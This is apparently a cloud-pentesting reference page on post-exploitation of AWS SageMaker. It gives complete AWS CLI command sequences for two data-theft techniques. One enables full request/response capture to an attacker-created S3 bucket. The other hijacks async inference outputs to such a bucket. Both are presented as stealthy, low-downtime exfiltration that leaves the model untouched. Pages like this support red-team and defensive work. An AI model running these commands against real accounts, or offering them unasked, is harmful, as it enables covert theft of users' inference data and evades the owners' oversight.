AWS - SageMaker Post-Exploitation

Reading time: 5 minutes

SageMaker endpoint data siphon via UpdateEndpoint DataCaptureConfig

Abuse SageMaker endpoint management to enable full request/response capture to an attacker‑controlled S3 bucket without touching the model or container. Uses a zero/low‑downtime rolling update and only requires endpoint management permissions.

Requirements

• IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
• S3: s3:CreateBucket (or use an existing bucket in the same account)
• Optional (if using SSE‑KMS): kms:Encrypt on the chosen CMK
• Target: An existing InService real‑time endpoint in the same account/region

Steps

1. Identify an InService endpoint and gather current production variants

REGION=${REGION:-us-east-1}
EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text)
echo "Endpoint=$EP"
CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
echo "EndpointConfig=$CFG"
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CFG" --query ProductionVariants > /tmp/pv.json

2. Prepare attacker S3 destination for captures

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-capture-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION

3. Create a new EndpointConfig that keeps the same variants but enables DataCapture to the attacker bucket

Note: Use explicit content types that satisfy CLI validation.

NEWCFG=${CFG}-dc
cat > /tmp/dc.json << JSON
{
  "EnableCapture": true,
  "InitialSamplingPercentage": 100,
  "DestinationS3Uri": "s3://$BUCKET/capture",
  "CaptureOptions": [
    {"CaptureMode": "Input"},
    {"CaptureMode": "Output"}
  ],
  "CaptureContentTypeHeader": {
    "JsonContentTypes": ["application/json"],
    "CsvContentTypes": ["text/csv"]
  }
}
JSON
aws sagemaker create-endpoint-config \
  --region $REGION \
  --endpoint-config-name "$NEWCFG" \
  --production-variants file:///tmp/pv.json \
  --data-capture-config file:///tmp/dc.json

4. Apply the new config with a rolling update (minimal/no downtime)

aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"

5. Generate at least one inference call (optional if live traffic exists)

echo '{"inputs":[1,2,3]}' > /tmp/payload.json
aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \
  --content-type application/json --accept application/json \
  --body fileb:///tmp/payload.json /tmp/out.bin || true

6. Validate captures in attacker S3

aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize

Impact

• Full exfiltration of real‑time inference request and response payloads (and metadata) from the targeted endpoint to an attacker‑controlled S3 bucket.
• No changes to the model/container image and only endpoint‑level changes, enabling a stealthy data theft path with minimal operational disruption.

SageMaker async inference output hijack via UpdateEndpoint AsyncInferenceConfig

Abuse endpoint management to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. This exfiltrates model predictions (and any transformed inputs included by the container) without modifying the model/container.

Requirements

• IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
• S3: Ability to write to the attacker S3 bucket (via the model execution role or a permissive bucket policy)
• Target: An InService endpoint where asynchronous invocations are (or will be) used

Steps

1. Gather current ProductionVariants from the target endpoint

REGION=${REGION:-us-east-1}
EP=<target-endpoint-name>
CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CUR_CFG" --query ProductionVariants > /tmp/pv.json

2. Create an attacker bucket (ensure the model execution role can PutObject to it)

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-async-exfil-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION || true

3. Clone EndpointConfig and hijack AsyncInference outputs to the attacker bucket

NEWCFG=${CUR_CFG}-async-exfil
cat > /tmp/async_cfg.json << JSON
{"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}}
JSON
aws sagemaker create-endpoint-config --region $REGION   --endpoint-config-name "$NEWCFG"   --production-variants file:///tmp/pv.json   --async-inference-config file:///tmp/async_cfg.json
aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"

4. Trigger an async invocation and verify objects land in attacker S3

aws s3 cp /etc/hosts s3://$BUCKET/inp.bin
aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true
sleep 30
aws s3 ls s3://$BUCKET/async-out/ --recursive || true
aws s3 ls s3://$BUCKET/async-fail/ --recursive || true

Impact

• Redirects asynchronous inference results (and error bodies) to attacker-controlled S3, enabling covert exfiltration of predictions and potentially sensitive pre/post-processed inputs produced by the container, without changing model code or image and with minimal/no downtime.